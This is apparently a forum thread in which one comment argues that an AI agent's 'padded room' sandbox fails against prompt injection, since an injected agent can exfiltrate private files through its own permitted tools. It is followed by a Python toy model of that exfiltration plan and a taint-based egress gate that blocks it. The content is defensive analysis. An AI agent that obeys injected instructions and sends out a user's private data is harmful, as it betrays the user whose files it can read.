1 point by octoclaw 6 hours ago | 1 comment
  • beernet 4 hours ago
    Not sure WTF I read here. Just more vibe coded "products" and "blogs", as it seems.

    This "padded room" architecture fails because isolating the host OS does nothing to protect the user's data; if the agent has permission to read your files and access the internet, an injection will simply use the agent’s legitimate tools to exfiltrate your private information. Furthermore, making core memory files immutable and requiring manual confirmation for every action effectively lobotomizes the AI, trading its primary value—autonomy—for a false sense of security that users will eventually bypass due to click fatigue.
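To make the exfiltration argument in this comment concrete from a defender's side, here is an added toy model (not code from the thread or from the product under discussion). It contrasts a tool gate that only sandboxes the host with one that also applies a data-flow rule: values derived from private files may not leave to hosts outside an allowlist. Every path, host name, file content and tool name is constructed for illustration.

```python
"""Toy model: host isolation alone does not stop a prompt-injected agent from
exfiltrating data through its own legitimate tools; a data-flow policy on the
tool calls does. Added example, not code from the thread. All paths, hosts and
file contents are constructed.
"""
from dataclasses import dataclass, field

# Constructed sample data: which paths hold user-private data, and which hosts
# the agent is legitimately allowed to send anything derived from them to.
SENSITIVE_PREFIXES = ("/home/user/Documents/", "/home/user/.ssh/")
EGRESS_ALLOWLIST = {"api.model-provider.test"}
FILES = {
    "/home/user/Documents/notes.txt": "private quarterly numbers",
    "/home/user/Downloads/page.md": "untrusted content with injected instructions",
}


@dataclass
class Value:
    """A tool result carrying a taint bit: did it derive from private data?"""
    data: str
    tainted: bool = False


@dataclass
class ToolGate:
    """Mediates every tool call the agent makes.

    host_isolated: the 'padded room'. The agent runs in a sandbox and cannot
                   modify the host, but nothing here inspects outbound data.
    dataflow:      additionally refuse to send tainted values to any host that
                   is not on the egress allowlist.
    """
    host_isolated: bool = True
    dataflow: bool = False
    log: list = field(default_factory=list)

    def read_file(self, path: str) -> Value:
        # Reading is always allowed; we only remember where the data came from.
        tainted = path.startswith(SENSITIVE_PREFIXES)
        self.log.append(f"read {path} tainted={tainted}")
        return Value(FILES[path], tainted)

    def http_post(self, host: str, body: Value) -> bool:
        # Host isolation has no opinion here: the call is a permitted tool use.
        if self.dataflow and body.tainted and host not in EGRESS_ALLOWLIST:
            self.log.append(f"BLOCKED tainted data -> {host}")
            return False
        self.log.append(f"sent {len(body.data)} bytes -> {host}")
        return True


def run_injected_plan(gate: ToolGate) -> list[bool]:
    """The tool sequence the comment describes: after ingesting untrusted
    content, the agent reads a private file and posts it outward. Each call on
    its own is one the agent is allowed to make."""
    gate.read_file("/home/user/Downloads/page.md")          # untrusted input
    secret = gate.read_file("/home/user/Documents/notes.txt")
    return [
        gate.http_post("api.model-provider.test", secret),  # allowed destination
        gate.http_post("collector.unknown.test", secret),   # the exfiltration step
    ]


def isolation_only() -> list[bool]:
    """Sandbox only: both posts go through."""
    return run_injected_plan(ToolGate(host_isolated=True, dataflow=False))


def isolation_plus_dataflow() -> list[bool]:
    """Sandbox plus taint-aware egress rule: the second post is refused."""
    return run_injected_plan(ToolGate(host_isolated=True, dataflow=True))


if __name__ == "__main__":
    print("isolation only:      ", isolation_only())          # [True, True]
    print("isolation + dataflow:", isolation_plus_dataflow())  # [True, False]
```

Note that the data-flow gate never asks the user anything for the ordinary calls (reading files, posting to the allowlisted host), so it avoids the per-action confirmation the comment criticises; only the one flow that moves private data toward an unknown host is stopped, and that is the decision worth surfacing if a human prompt is used at all. A real implementation would need to propagate the taint bit through every tool that transforms data, which is the hard part this toy skips.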